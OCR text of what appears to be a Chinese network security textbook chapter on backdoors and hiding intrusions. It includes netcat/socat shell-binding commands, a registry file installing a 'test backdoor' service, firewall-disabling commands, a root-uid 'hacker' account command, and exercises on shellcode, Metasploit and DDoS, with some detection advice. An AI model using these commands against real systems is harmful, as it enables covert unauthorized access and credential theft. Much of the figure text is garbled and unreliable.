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意 程序 ,与 远 端 攻 击 者 程序 建立 控制 连接 使 得 攻击 者 可 以 进行 远程 控制 。 

5-7 ”练习 使 用 "上 兴 远 程控 制 ? 生 成 反 向 连接 恶意 代码 ,该 代码 应 该 能 Web 访问 指 
定 URL 从 而 自动 寻找 攻击 者 的 IP 地 址 , 当 该 代码 植 和 人 受害 者 主机 后 ,开启 “上 兴 远 程控 
制 ”的 客户 端 ,目标 主机 会 自动 上 线 , 尝 试 和 体验 各 种 远程 控制 功能 。 

5-8 根据 5.4. 2 节 中 描述 的 Shellcode 基本 原理 ,尝试 编写 一 个 简单 的 Shellcode, 它 
能 对 如 下 示例 代码 进行 溢出 攻击 ,执行 Shellcode 中 的 Payload 指令 : 

void stackover(char * ptr){ 


char buffer[8]; 
strcpy(buffer, ptr); // 未 检查 ptr 的 内 容 长 度 


printf("string= % s\n", buffer); 

} 

5-9 练习 使 用 Metasploit 平 台 ,对 某 台 已 知 具体 漏洞 的 Windows 靶 机 实施 攻击 , 设 
置 反 向 连接 Payload 和 攻击 参数 ,实施 具体 的 漏洞 破解 攻击 。 

5-10 ”练习 使 用 Hyenae 或 XOIC/LOIC 对 某 靶 机 实施 DDoS, 并 开启 Wireshark 监 
听 攻 击 报 文 ,检测 攻击 前 后 其 他 主机 访问 该 靶 机 的 页 面 时 是 否 有 明显 时 间 差 别 ,分 析 攻 击 
原理 ,设计 可 能 的 防御 措施 。 

5-11 练习 使 用 PyLoris 和 Torshammer 对 某 靶 机 实施 DDoS, 并 开启 Wireshark 监 
听 TCP 报 文 , 检 测 攻击 前 后 其 他 主机 访问 该 靶 机 的 页 面 时 是 否 有 明显 差别 ,分 析 这 些 工 
具 如 何 利 用 TCP 连接 缓慢 发 送 HTTP 报 文 ,从 而 延长 连接 时 间 , 考 虑 可 能 的 防御 措施 。 
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学 习 要 求 : 

。 理解 各 种 后 门 技术 的 基本 原理 。 

。 掌握 在 Windows 和 Linux 系统 中 开放 连接 端口 的 基本 方法 。 

。 掌握 在 Windows 和 Linux 系统 中 修改 系统 配置 的 基本 方法 。 

了 解 安装 监控 器 、 建 立 隐 项 连接 和 安装 远程 控制 的 基本 原理 。 

。 掌握 在 Windows 和 Linux 系统 中 应 用 脚本 创建 用 户 账户 的 基本 方法 。 

掌握 使 用 msfevnom 和 backdoor_factory 工具 实现 系统 文件 替换 的 基本 方法 。 
熟练 掌握 Meterpreter 和 Intersect 等 后 门 工 具 的 使 用 方法 。 

。 掌握 Windows 痕迹 清除 的 基本 方法 ,理解 Linux 痕迹 清除 的 基本 方法 。 


攻击 者 在 成 功 完成 对 目标 的 远程 攻击 后 ,为 保持 对 目标 的 长 久 控制 并 再 次 方便 地 进 
入 目标 系统 ,需要 建立 一 些 进 入 系统 的 特殊 途径 , 即 网 络 后 门 。 同 时 ,为 了 不 被 管理 员 发 
现 系统 曾经 被 攻击 或 和 人 侵 , 则 需要 清除 实施 攻击 时 产生 的 系统 日 志 、 程 序 日 志 、 临 时 数据 
和 文件 等 , 即 消除 所 有 攻击 痕迹 ,仿佛 该 攻击 从 未 发 生 过 。 


6.1 网 络 后 门 


理想 的 后 门 应 该 是 无 论 用 户 账 号 是 否 变化 ,无 论 系统 服务 是 开启 还 是 关闭 ,无 论 系统 
配置 如 何 变化 ,都 存在 一 条 秘密 通道 能 够 让 攻击 者 再 次 隐蔽 进入 目标 系统 或 网 络 。 

创建 后 门 的 主要 方法 包括 开放 连接 端口 、 修 改 系统 配置 .安装 监控 器 、 建 立 隐 项 连接 
通道 ,创建 用 户 账号 .安装 远程 控制 工具 和 替换 系统 文件 等 。 


6.1.1 开放 连接 端口 


开放 连接 端口 的 方式 大 致 可 以 分 为 两 种 ,一 种 是 通用 的 类 似 Telnet 服务 的 shell 访 
问 端口 ,可 以 选择 任何 一 个 TCP/UDP 端口 , 既 可 以 是 系统 未 使 用 的 端口 ,也 可 以 是 系统 
已 使 用 的 端口 (此 时 需要 利用 5. 4 节 提 到 的 端口 复 用 技术 ) ,攻击 者 正 向 连接 该 端口 即 可 
获得 一 个 远程 访问 的 shell, 从 而 建立 后 门 通道 。 

Netcat? 工具 (Windows 程序 是 nc. exe,Linux 程序 是 nc) 是 最 古老 也 是 最 实用 的 端 


四 ”http://ncl10. sourceforge. net/ 。 
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口 开 放 工 具 , 使 用 它 可 以 轻松 在 任何 端口 监听 ,也 可 以 将 其 作为 客户 端 访 问 任 何 远 程 主机 
开启 的 端口 。 图 6-1 示例 如 何 使 用 Linux 下 的 Netcat 工具 程序 Cnc) 绑 定 程序 “/bin 
bash” 在 目标 主机 开启 1999 端口 , 当 攻 击 者 使 用 Netcat 工具 连接 该 端口 时 ,立即 获得 
个 远程 的 bash ,此 时 即 可 远程 控制 目标 主机 ,参数 -t 表示 采用 Telnet 协议 方式 进行 通 
在 Windows 系统 中 ,通常 绑 定 cmd. exe 程序 作为 后 门 , 如 图 6-2 所 示 , 从 Linux 系统 访问 


远程 Windows 7 会 获得 一 个 远程 的 cmd shell 
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图 6-1 Netcat 设 置 Linux 后 门 示例 
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图 6-2 Netcat 设 置 Windows 后 门 示 例 
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Socat? 工具 是 Netcat 的 增强 版 ,主要 用 于 在 两 个 输入 /输出 流 之 间 建 立 双 向 数据 转 
发 ,特别 适合 端口 绑 定 、 端 口 转发 之 类 的 工作 。 它 的 功能 十 分 强大 ,但 是 目前 只 有 Linux 
和 UNIX 版 本 。 其 基本 用 法 如 图 6-3 所 示 ,“TCP4-LISTEN” 表 示 开 启 本 机 1999 端口 ， 
“EXEC” 表 示 将 1999 端口 的 输入 /输出 数据 转发 至 程序 /bin/bash 的 输入 /输出 ,“-” 表 示 
基本 的 输入 /输出 , 它 被 重 定向 到 本 地 127. 0. 0. 1 的 TCP 1999 端口 ,实际 上 等 价 于 向 该 
端口 发 起 连接 ,从 而 获得 一 个 远程 “bash shell”。 








图 6-3 ”Socat 开启 端口 和 访问 示例 


另外 ,利用 Metasploit 平台 的 msfvenom 工具 并 结合 各 种 Payload 也 可 以 预先 生成 
在 指定 端口 开放 的 后 门 程序 ( 见 5. 3. 2 节 的 图 5-51) 。 

另 一 种 开放 端口 的 方式 就 是 隐蔽 地 开启 已 有 系统 服务 从 而 打开 相应 端口 ,如 偷偷 利 
用 命令 脚本 开启 Windows 的 网 络 共享 服务 .Telnet 服务 、 远 程 桌面 或 志 端 服务 等 ， 
图 6-4 列 出 了 使 用 “net start” 命 令 在 后 台 开 启 网 络 共享 服务 “Server” 和 远程 桌面 服务 
“Remote Desktop Service” 的 方式 ,Windows 7 系统 的 服务 如 果 处 于 “禁用 ”状态 ,那么 还 
需要 使 用 “sc” 工 具 将 其 状态 修改 为 手动 ”或 自动” 方式。 在 Windows 7 系统 中 ,要 执行 
服务 的 有 关 命 令 或 脚本 ,必须 具备 管理 员 权 限 




















图 6-4 隐蔽 开启 和 关闭 服务 


日 


http://www. dest-unreach. org/socat/ 。 


加 Windows 7 的 家 用 版 不 支持 远程 桌面 服务 。 
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Linux 系统 中 通常 可 以 使 用 “service xxx start” 和 “service xxx stop” 肢 本 开启 或 关闭 
系统 服务 程序 。 以 Ubuntu Linux 为 例 , 所 有 的 开机 启动 服务 程序 位 于 “/etc/init. d” 目 录 
中 ,在 /etc/rcX. d 中 存 有 这 些 服务 的 链接 ,根据 开头 是 “K” 还 是 “S” 决 定 是 否 启 动 相应 服 
务 , 目 录 中 的 “X” 对 应 的 是 不 同 运行 级 别 ,“X” 值 可 以 为 0~6 或 者 S( 图 6-5)。 
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图 6-5 Linux 下 的 服务 列表 





险 测 此 类 后 门 的 方法 一 般 是 查看 当前 网 络 连接 状态 ,寻找 有 无 不 正常 的 连接 。 常 用 

















方法 包括 : 

(1) 通过 “netstat -ano” 检 查 哪些 进程 开启 了 哪些 端口 (图 6-6) 。 
国 omdexe esx | 
C:\Windows\Systen32>netstat -anoinore 
笑 动 连接 

协议 外 部 地 址 状态 PID 

TCP -888 LISTENING 1994 
TCP LISTENING 3152 
TCP LISTENING 4 
TCP LISTENING 2628 
TCP LISTENING 2628 
TCP LISTENING 4388 
TCP LISTENING 668 
TCP LISTENING 1889 
TCP LISTENING 1168 
TCP LISTENING 749 
TCP LISTENING 724 
TCP LISTENING 4388 
TCP LISTENING 3152 
TCP LISTENING 4336 
TCP LISTENING 2688 
TCP ESTABLISHED 。。 4398 
TCP ESTABLISHED 。。 4398 
TCP ESTABLISHED C4388 
TCP ESTABLISHED 。。 4398 
TCP ESTABLISHED 。。 3724 

lc: Windows \Systen32>, ~ 
上 











图 6-6 ”检查 系统 开启 端口 


(2) 使 用 微软 提供 的 Sysinternal 免费 工具 集中 的 TCPView 查看 详细 的 TCP 连接 
和 UDP 信息 (图 6-7)。 
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360AP ee T7843 wp TangTang Pe 53331 : : 

360rp exe 35832 UDP Tang-PC S4614 : 

360rp ee S52 wp Tananf-PC 615 : : 
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图 6-7 TCPView 实时 显示 当前 的 TCP/UDP 端口 状态 


攻击 者 为 了 规避 管理 员 的 检测 ,可 能 会 进一步 替换 这 些 系 统 程序 或 工具 ,使 其 不 显示 
特定 的 端口 或 TCP 连接 信息 ,达到 隐藏 后 门 的 目的 ,所 以 管理 员 还 要 经 常 检 查 这 些小 工 
具 程序 本 身 是 否 已 经 被 蔡 换 。 


6.1.2 修改 系统 配置 


修改 系统 配置 包括 增加 开机 启动 项 增加 或 修改 系统 服务 设置 ,修改 防火 墙 和 安全 软 
件 配置 。 
为 了 方便 每 次 启动 时 自动 运行 ,后 门 程序 往往 需要 将 执行 的 脚本 或 命令 行 添加 到 目 
标 系 统 的 开机 启动 脚本 中 。Windows 系统 开机 运行 程序 的 常见 位 置 包括 : 
(1) 注册 表 键 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 
(2) 注册 表 键 HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 
(3) 注册 表 键 HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components 
(4) 注册 表 键 HKLM\SOFTWARE\Microsoft\ Windows NT\CurrentVersion\ 
Windows\Appinit_Dlls 
(5) 开始 菜单 中 的 “启动 ”菜单 项 C:\ProgramData\Microsoft\ Windows\Start Menu\ 
Programs\Startup 
(6) 资源 管理 器 有 关 的 shell 菜单 项 
。 HKLM\Software\Classes\Drive\ShellEx\Context MenuHandlers 
。 HKLM\Software\Classes\Directory\Shellex\DragDropHandlers 
(7) 计划 任务 列表 Task Schedule 
(8) 系统 服务 HKLM\System\CurrentControlSet\Services 
(9) IE 浏览 器 扩展 
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。 HKLM\ Software\ Microsoft\ Windows \ CurrentVersion \ Explorer \ Browser 
Helper Objects 
。 HKCU\Software\ Microsoft\Internet Explorer\Extensions 
(10) 多 媒体 编码 解码 器 
。 HKLM\ Software\ Classes\ CLSID\ {083863F1-70DE-11d0-BD40-00A0C911CE86} \ 
Instance 
使 用 Sysinternals 工具 集中 的 autoruns 工具 (或 其 命令 行 版 本 autorunsc. exe) ,可 以 
枚 举 Windows 系统 的 所 有 开机 执行 的 程序 、 脚 本、 动态 链接 库 , 它 是 查找 Windows 开机 
启动 后 门 的 利器 。 图 6-8 示例 使 用 autoruns 对 一 台 Windows 7 系统 的 检测 结果 ,发 现 了 
一 个 开机 自 运行 的 VB 脚本 Ksehzh. vbs, 用 于 运行 一 个 病毒 程序 “Ksehzh01234. exe”, 该 
脚本 试图 在 执行 后 将 自身 删除 。 
On Error Resume Next 
Set ws = CreateObject("Wscript.Shell") 
Set fso = CreateObject("Scripting. FileSystemObject") 
ws. run """Ksehzh01234. exe""", ,False 


fso. DeleteFile WScript. ScriptFullName // 执 行 后 自动 删除 自身 脚本 文件 
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图 6-8 autorun 的 运行 界面 示例 


需要 注意 的 是 ,此 类 开机 启动 脚本 由 于 比较 简短 上 且 变化 较 多 ,通常 并 不 会 被 安全 软件 
查 杀 ( 该 主机 已 安装 最 新 的 360 安全 卫士 和 杀毒 软件 包 ) ,需要 管理 员 养 成 日 常 检 查 开 机 
启动 项 的 安全 习惯 。 

Linux 系统 可 以 设置 后 门 的 位 置 包括 开机 自 运行 .登录 自 运 行 \ 定 时 执行 等 。 以 
Ubuntu 为 例 , 在 装载 系统 内 核 后 会 执行 第 一 个 进程 “init”, 它 读 取 */etc/init/” 目 录 中 保 
存 的 “rc-system . conf” 启 动 配置 文件 ,执行 相应 脚本 ,包括 “/etc/rc. d/rc. sysinit”、“etc/ 
rc, d/rcX. d” 中 K 和 S 开头 的 脚本 以 及 “/etc/rc. local” 脚 本 ,攻击 者 可 以 在 这 些 脚 本 文件 
中 插入 启动 后 门 的 指令 。 

当 用 户 登录 时 ,bash 会 先 自动 执行 全 局 登录 脚本 “/ect/profile”, 然 后 在 用 户主 目录 
下 按 顺 序 查找 并 执行 “. bash_profile”、“. bash_login” 和 *“/. profile” 脚 本 ,这 些 文件 也 可 以 
用 来 插入 指令 用 于 执行 登录 自 运行 的 后 门 。 还 可 以 使 用 “at” 或 “crontab” 工 具 来 定时 执 
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行 后 门 程序 ,Linux 有 一 个 名 为 “crond” 的 守护 程序 ,主要 功能 是 周期 性 地 检查 “/var/ 
spool/cron” 目 录 的 命令 文件 的 内 容 , 并 根据 设 定时 间 执 行 这 些 文件 中 的 命令 。 攻 击 者 可 
以 通过 crontab 命令 建立 、 修改、 删除 这 些 命令 文件 ,at 与 crond 类 似 ,但 它 只 执行 一 次 。 

在 目标 系统 中 安装 自动 启动 的 服务 也 是 一 种 开机 自动 运行 后 门 的 方式 ,几乎 所 有 的 
后 门 程序 都 提供 此 类 功能 。 服 务 包括 普通 的 应 用 程序 服务 (service) 和 驱动 程序 (driver) 
服务 ,都 需要 在 注册 表 中 的 “HKLM\System\CurrentControlSet\Services” 项 中 增加 相应 
子 项 ,可 以 用 程序 “services. msc” 或 者 autoruns 工具 检测 系统 开机 启动 的 服务 程序 。 

Windows 服务 程序 的 安装 有 两 种 方式 ,一 是 直接 修改 注册 表 , 二 是 利用 sc 程序 创建 
服务 程序 启动 项 。Windows 服务 程序 有 其 特定 要 求 ,不 是 任何 应 用 程序 都 可 以 作为 服务 程 
序 存在 。Windows 增加 一 个 新 的 服务 程序 所 需要 的 注册 表 项 中 的 各 项 键 值 的 含义 如 下 ， 

(1) DisplayName, 字 符 串 值 ,对 应 服务 名 称 ; 

(2) Description, 字 符 串 值 ,对 应 服务 描述 ; 

(3) ImagePath, 字 符 串 值 ,对 应 该 服务 程序 所 在 的 路 径 ; 

(4) ObjectName, 字 符 串 值 , 值 默认 为 LocalSystem, 表 示 本 地 登录 执行 ; 

(5) ErrorControl,DWORD 值 , 值 为 "1”; 

(6) Start,DWORD 值 , 值 为 1 表示 系统 ,2 表示 自动 运行 ,3 表示 手动 运行 ,4 表示 
禁止 ; 

(7) Type,DWORD 值 , 应 用 程序 对 应 0x10, 其 他 对 应 0x20 。 

下 面 列 出 了 一 个 增加 服务 程序 “ncsrv. exe” 的 注册 表 文件 的 具体 内 容 , 读 者 可 以 自行 
修改 : 

Windows Registry Editor Version 5.00 

// 下 画 线 部 分 的 字符 串 可 修改 为 其 他 字符 串 

[HKEY_LOCAL_ MACHINE\SYSTEM\ControlSet001\services\door_test] 

"Type" = dword:00000010 

"Start" = dword:00000002 

"ErrorControl" = dword:00000001 

"ImagePath" = "d:\\ 工 作 目 录 \\ncat\\ncsrv. exe -t -1 -p 2000" // 在 2000 端口 开启 监听 

"DisplayName" = "test backdoor" 

"ObjectName" = "LocalSystem" 

"Description" = "ncat” 

图 6-9 列 出 了 执行 “sc create” 增 加 一 个 名 为 test123 的 服务 条 目 , 它 会 根据 提供 的 命 
令 行 自动 安装 相应 的 服务 ,但 是 服务 的 正确 执行 依赖 于 程序 的 自身 实现 ,如 果 直 接 按 
图 6-10 所 示 使 用 nc. exe 开启 服务 ,系统 会 报错 *[ 系 统 ] 错 误 1053 :服务 没有 及 时 响应 启 
动 或 控制 请 求 ”, 因 为 该 程序 并 不 符合 服务 程序 的 规范 。 对 于 服务 配置 的 修改 可 以 直接 使 
用 “sc config” 命 令 在 控制 台 对 有 关 服 务 进行 修改 。 

在 后 台 修改 防火 墙 或 者 入 侵 防 御 工具 的 系统 配置 ,允许 后 门 程序 与 远程 攻击 者 进行 
连接 并 且 不 产生 任何 报警 或 系统 日 志 , 避 免 管 理 员 发 现 后 门 的 隐蔽 信道 。 例 如 在 6. 1. 1 
节 开 放 服务 端口 作为 后 门 时 ,如 果 攻 击 者 向 该 端口 发 起 连接 ,那么 Windows 个 人 防火 墙 
通常 会 弹出 提示 框 , 表 明 有 程序 正在 接受 外 部 连接 ,此 时 后 门 其 实 已 经 暴露 。 攻 击 者 针对 这 
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种 情况 ,可 以 采用 两 种 对 策 ,一 是 关闭 防火 墙 , 二 是 将 后 门 程序 设置 为 防火 墙 的 信任 程序 。 





ToppE lk: 在 注册 表 和 服务 数据 库 中 创建 服务 项 - 
ji Eo ney Chanpeth 1 optont> copedona>.. 
也 Depayame 
Control 
em 
: | 
toll} 
bedNane 
Themes 出 
sant 
THREADORDER 
Tea OP 





图 6-9 使 用 sc 创建 系统 服务 示例 






test123 的 属性 (本 地 计算 机 ) 





京 坝 ”| 量 录 “| 恢 奢 “| 依存 关系 


8 服务 全 称 


Shell Hardware 





smart Card 
Smart Card Rem, 

SNMP Trap 
Software Protect. 
Spp Notification 
SSDP Discovery 
Superfetch 





System Event N.. 2 
Tablet PC Input 
Task Scheduler 

TCP/IP NetBIOS 
Telephony 





当 从 此 处 启动 服务 时 ， 您 可 指定 所 适用 的 启 a 袁 数 * 
test backdoor 启动 基教 
test123 
Themes 


Thread orderin 


图 6-10 服务 test123 安装 结果 





Linux 中 的 防火 墙 默 认 是 iptables, 只 需要 执行 





Firewall”, 关 闭 防火 墙 的 方法 有 两 种 
(1) net stop "Windows Firewall" ;net 关闭 服务 使 用 显示 名 称 ; 
(2) sc stop "MpsSve";sc 关闭 服务 指明 的 是 实际 名 称 (图 6-11)。 





ABLE, NOT_PAUSABLE, IGNORE 


CODE 
IT_c0 


CE: Window: ten32)。 





图 6-11 关闭 Windows 防火 墙 服务 


ervice iptables stop” 指 令 即 可 关闭 


默认 防火 墙 。Windows 系统 中 防火 墙 服 务 的 名 称 是 “MpsSvec”, 显 示 名 称 是 “Windows 
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但 是 ,关闭 防火 墙 的 动作 有 时 过 于 粗暴 ,同样 会 引起 管理 员 和 警觉, 所 以 最 好 的 办 法 是 
将 自己 变 为 防火 墙 的 可 信任 程序 。 对 于 Windows 防火 墙 , 其 默认 动作 是 阻止 与 规则 不 匹 
配 的 入 站 连接 ,允许 与 规则 不 匹配 的 出 站 连接 ,因此 一 个 比较 可 行 的 办 法 是 增加 一 条 入 站 
规则 ,允许 所 有 与 该 后 门 程序 有 关 的 报 文通 过 , 即 人 站 规则 的 动作 设置 为 允许 。 可 以 使 用 
“netsh advfirewall firewall” 命 令 通过 命令 行 增 加 和 删除 防火 墙 规则 ,从 而 隐藏 后 门 连接 
通道 ,如 图 6-12 所 示 。 





(a) (b) 
图 6-12 命令 行 增加 一 条 防火 墙 规则 


图 6-12 增加 一 条 名 为 “test123” 的 规则 , 它 允 许 所 有 与 nc. exe 程序 有 关 的 TCP 报 文 
进入 ,profile 表示 具体 的 网 络 配置 文件 ,包括 域 配置 .专用 和 公用 配置 文件 ,这 里 设置 为 
any 即 全 部 都 允许 。 以 后 当 nc. exe 再 次 在 后 台 隐 蔽 启动 时 ,Windows 防火 墙 就 不 会 有 任 
何 提示 。Linux 中 修改 iptables 防火 墙 比较 简单 ,因为 iptables 默认 就 是 基于 命令 行 配 
置 , 但 是 它 无 法 基于 程序 名 来 建立 规则 ,只 能 根据 后 门 程序 具体 打开 的 端口 号 来 动态 修改 
防火 墙 规则 ,例如 nc 打开 了 2000 端口 , 则 增加 如 下 一 条 规则 即 可 : 

iptables — A INPUT -ptcp -- dport 2000 — j ACCEPT 
表示 所 有 连接 TCP 2000 端口 的 报 文 都 允许 进入 。 

使 用 命令 行 工 具 secedit. exe 可 以 在 后 台 修 改 Windows 安全 策略 配置 ,从 而 更 好 地 
隐藏 后 门 程序 。 使 用 图 6-13 所 示 方 法 可 以 导出 和 修改 当前 有 关系 统 安全 配置 , 先 将 当前 
安全 配置 导入 到 文件 d:\test. inf 中 ,根据 攻击 者 需要 手动 调整 配置 后 ,再 重新 导入 系统 ， 
即 可 偷偷 修改 安全 配置 ,test. db 指明 新 生成 的 安全 配置 文件 名 称 。 

针对 各 种 安全 防御 软件 ,如果 它们 存在 命令 行 配置 方式 ,那么 放置 后 门 程序 时 ,要 充 
分 利用 它们 的 配置 弱点 ,使 得 后 门 可 以 绕 过 这 些 防 御 软 件 的 检测 。 但 是 类 似 360 安全 卫 
士 的 安全 软件 就 不 存在 命令 行 配置 方法 ,此 时 可 以 采用 类 似 “ 按 键 精灵 ”0 软件 的 方案 , 预 
先 编写 好 鼠标 和 键盘 执行 脚本 ,模拟 鼠标 和 键盘 操作 对 安全 软件 进行 配置 ,隐藏 后 门 。 


6.1.3 安装 监控 器 
后 门 程序 安装 的 监控 器 通常 包括 进程 监控 器 、 文 件 监控 器 .内 存 监 控 器 、 键 盘 监 控 器 


加 ”http://baike. baidu. com/item/ 按 键 精灵 。 
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:iezecedit /oxport /cfg tost.inf 


上 评 帮 ， 请 参阅 日 志 xwindirx\security\logs\scesrv.1log。 


: nore test.inf 


huditAccountManage ~ 日 


p: \Pocodit /configure /db tost-db /cfg test.inf 





图 6-13 后 台 修 改 系 统 安全 配置 





和 报 文 监控 器 等 ,采用 与 防御 软件 相同 的 方式 监视 其 感 兴 趣 的 系统 事件 ,一 旦 系统 出 现 所 
关注 的 事件 或 者 某 些 敏感 关键 词 ,后 门 程序 可 以 立即 启动 相应 模块 进行 记录 、 阻 止 或 者 实 
时 通知 攻击 者 等 。 

这 部 分 功能 与 远程 木马 等 恶意 代码 的 功能 (图 5-55) 基 本 类 似 , 但 是 监控 器 只 负责 监 
视 并 记录 信息 ,攻击 者 根据 这 些 信息 可 以 进一步 攻击 目标 网 络 中 的 其 他 主机 。 比 如 通过 
键盘 监控 和 报 文 监控 ,攻击 者 可 能 获取 目标 用 户 远程 登录 其 他 主机 或 者 服务 器 的 重要 账 
号 和 口令 ,从 而 获得 其 他 主机 的 非法 访问 权限 ; 对 进程 ,文件 和 内 存 监 控 , 可 以 获取 目标 
程序 或 目标 文件 的 敏感 数据 信息 ,甚至 获取 程序 或 协议 的 加 /解密 密 钥 ,从 而 进一步 在 目 
标 网 络 中 展开 MITM 等 攻击 。 

-个 后 门 程序 可 以 仅仅 是 一 个 键盘 监控 工具 或 者 口令 监听 工具 。 例 如 “键盘 记录 器 
暗夜 版 ?2 就 是 一 个 专门 记录 用 户 键盘 操作 的 后 门 程序 ,利用 此 软件 记录 用 户 输入 ,可 以 
盗 取 用 户 的 QQ .电子 邮件 、 网 络 游戏 等 账号 和 口令 以 及 其 他 的 隐私 信息 。 再 例如 
Windows 的 Windump 工具 以 及 Linux 的 tcpdump 和 ferret 工具 ( 见 2.6 节 ), 也 可 以 直 
接 作为 后 门 ,配合 使 用 BPF 过 滤 语 法 , 即 可 用 于 指定 协议 的 网 络 口 令 监 听 。 

6.1.4 建立 隐蔽 连接 通道 

建立 隐蔽 连接 指 后 门 与 控制 者 的 连接 与 正常 连接 几乎 相同 ,包括 正 向 连接 和 反 向 连 
接 ( 见 5. 3. 2 节 )。 所 谓 隐 项 , 即 安全 人 员 很 难 手工 区 分 这 类 连接 是 正常 的 外 部 访问 还 是 
隐蔽 连接 通道 。 

正 向 连接 通常 与 端口 复 用 ( 见 5. 4 节 ) 相 结合 ,例如 后 门 程序 可 以 复 用 “网 络 与 共享 服 













中 http://baike. baidu. com/item/ 键 盘 记 录 器 暗夜 版 
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务 ” 的 TCP 端口 135 ,将 正常 连接 135 端口 的 报 文 转发 到 本 地 环 回 地 址 127. 0. 0. 1 的 其 
他 端口 ,但 是 对 于 包含 特殊 字 节 序列 的 报 文 则 另行 单独 处 理 , 从 而 在 正常 的 通信 报 文中 杏 
人 隐蔽 通道 。 

反 向 连接 通常 使 用 HTTP 协议 与 攻击 者 建立 连接 通道 ,首先 ,防火 墙 不 会 去 阻止 此 
类 报 文 , 因 为 它们 是 正常 访问 外 部 主机 的 80 端口 ; 其 次 ,管理 员 人 工 观察 这 些 报 文 也 难 
以 发 现 问题 ,因为 它们 是 以 HTTP 请 求 应 答 的 方式 进行 通信 ,管理 员 很 容易 误 以 为 它们 
是 正常 的 HTTP 请 求 。 因 此 检测 此 类 报 文 往往 需要 入 侵 防 御 系 统 IPS 来 自动 完成 ,但 是 
攻击 者 可 以 对 HTTP 报 文 内 容 进 行 加 密 或 混淆 ,或 者 直接 使 用 HTTPS 协议 进行 加 密 通 
信 , 从 而 逃避 IPS 的 检测 。 

图 6-14 示例 “上 兴 远 程控 制 "(2009 版 ) 服 务 端 (192. 168. 24. 14) 向 客户 端 (192. 168. 
24. 136) 的 80 端口 发 起 反 向 连接 后 ,客户 端 远程 执行 “dir” 命 令 时 的 系统 状态 ,可 以 清楚 
地 看 到 截获 的 报 文中 返回 了 “c:\winnt” 目 录 下 的 文件 信息 ,说 明 连 接 内 容 并 没有 加 密 。 

针对 隐藏 连接 ,安全 人 员 可 以 采取 的 措施 主要 包括 : 

(1) 只 允许 内 网 主机 通过 代理 访问 外 网 ,从 而 可 以 在 代理 机 器 上 进行 监控 ; 

(2) 设置 监控 策略 ,重点 关注 与 普通 报 文 不 太一 样 的 奇怪 报 文 ,例如 过 长 的 HTTP 
请 求 ,过 快 的 HTTP 请 求 . 无 人 操作 的 主机 所 发 出 的 HTTP 请 求 等 。 


6.1.5 创建 用 户 账号 


创建 系统 级 用 户 账号 是 后 门 程序 的 常用 手段 , 当 目 标 系统 允许 远程 访问 时 ,一 个 拥有 
最 高 权限 的 用 户 账号 本 身 就 是 一 个 “超级 后 门 ”>, 如 果 目 标 系统 不 支持 远程 访问 ,可 以 利用 
6.1. 1 节 描 述 的 开放 端口 方法 ,在 后 台 开 启 某 种 远程 访问 服务 如 Telnet 或 远程 桌面 即 可 。 

Linux 使 用 useradd 和 passwd 两 条 命令 可 以 在 命令 行 方 式 下 新 增 一 个 用 户 , 如 下 所 示 : 

// 增 加 hacker 用 户 ,属于 root 组 且 uid 与 root 相同 

useradd —d /root -groot -s /bin/bash -o -u0 -gO0 hacker 

passwd hacker // 修 改 账户 口令 

Windows 系统 使 用 “net user” 命 令 可 以 增加 、 修 改 和 删除 账户 ,图 6-15 示例 如 何在 
Windows 命令 行 设置 新 账户 和 修改 账户 口令 。 但 是 这 仅仅 是 增加 了 一 个 普通 权限 的 用 户 ， 
还 要 进一步 将 其 加 入 管理 员 组 中 ,使 用 “net localgroup” 命 令 可 完成 该 项 工作 (图 6-16) 。 


6.1.6 安装 远程 控制 工具 


远程 控制 程序 也 是 后 门 的 一 种 ,但 是 它 不 仅仅 是 进入 目标 系统 的 隐蔽 通道 ,而 是 几乎 
可 以 直接 远程 操作 目标 主机 ,就 像 Windows 提供 远程 桌面 服务 一 样 。 

远程 控制 程序 一 般 分 为 客户 端 (Client) 和 服务 器 端 两 部 分 ,通常 将 客户 端 程序 安装 
到 攻击 者 主机 ,服务 器 端 安装 在 目标 主机 。 客 户 端 与 服务 器 端 建立 正 向 或 反 向 连接 ,然后 
通过 这 个 连接 传递 数据 。 客 户 端 发 送 各 种 远程 控制 命令 ,服务 端 在 目标 主机 执行 对 应 程 
序 或 指令 ,并 返回 执行 结果 或 数据 给 客户 端 。 国 内 比较 著名 的 远程 控制 工具 包括 灰 铝 子 、 
上 兴 远 程控 制 向日葵 等 ,国际 上 有 VNC、TeamViewer、UltraVNC 等 。 

“上 兴 远 程控 制 2 服务器 端的 配置 .生成 .安装 和 运行 方式 示例 参见 5. 3. 3 节 。 





深入 理解 信息 安全 防护 体系 





MB) /网 络 攻防 技术 与 实战 





丁 。 fT-9 图 


ne Ja ro 
Ba"tn5aaiap z6E'5 
ntpg iro> 









1 
duq "ueg oj 





102/2 UOT, 
FT 


umn Le ms man 
ge ou sad 7 anbp ul 








~ 9 
Ceatq ZI2T) poJmade> s3Kq VreT * (sq PTTZT alw uo 53Mq te : Fe = 


CT ITY ET) 


TD 





E96T OFLELG "OT LL 
I-08 COSESS ‘Or Te 
55T ovegss .orT oz 


第 6 章 ， 网 络 后 门 与 痕迹 清除 





PB: Snet user 


YANGYANG-PC 的 用 户 账户 





dninistrator Guest UpdatusUser 
gyang 


售 令 成 功 完成 。 





EC] fovogeten 人 zxx345 
TFT 


Dp: Ynet usor 


“YANGYANG-PC 的 用 户 账户 





aninistrator fguo Guest 
pdatusUser yangyang 
策 令 成 功 完成 。 





: 删除 账号 fguo 





EA 


图 6-15 ”net user 新 增 用 户 






bp: 
| 管理 只 对 计算 机 / 域 有 不 受 限制 的 完全 访问 权 











图 6-16 ”将 用 户 加 入 管理 员 组 
6.1.7 系统 文件 替换 


后 门 程序 可 以 直接 与 系统 文件 捆绑 ,替换 原始 系统 程序 ,使 得 修改 后 的 “系统 程序 ”在 
执行 正常 功能 的 同时 也 运行 后 门 程序 。 后 门 采 用 这 种 方式 就 无 须 修改 系统 配置 ,也 不 会 
在 目标 主机 的 文件 系统 中 留 下 痕迹 。 

msfvenom 工具 ( 见 5. 3.2 节 ) 就 可 以 用 来 将 后 门 程序 与 系统 文件 拥 绑 , 它 提供 了 针 
对 各 类 操作 系统 的 后 门 程序 ,使 用 Metasploit 平台 的 相应 Exploit 模块 与 目标 发 起 连接 。 

backdoor_factory 是 一 款 用 Python 开发 的 后 门 绑 定 工具 , 它 可 以 自动 地 向 所 支持 的 
正常 可 执行 文件 中 插入 恶意 代码 且 不 影响 原 程序 功能 ,适用 于 x86/x64 系统 。 图 6-17 示 
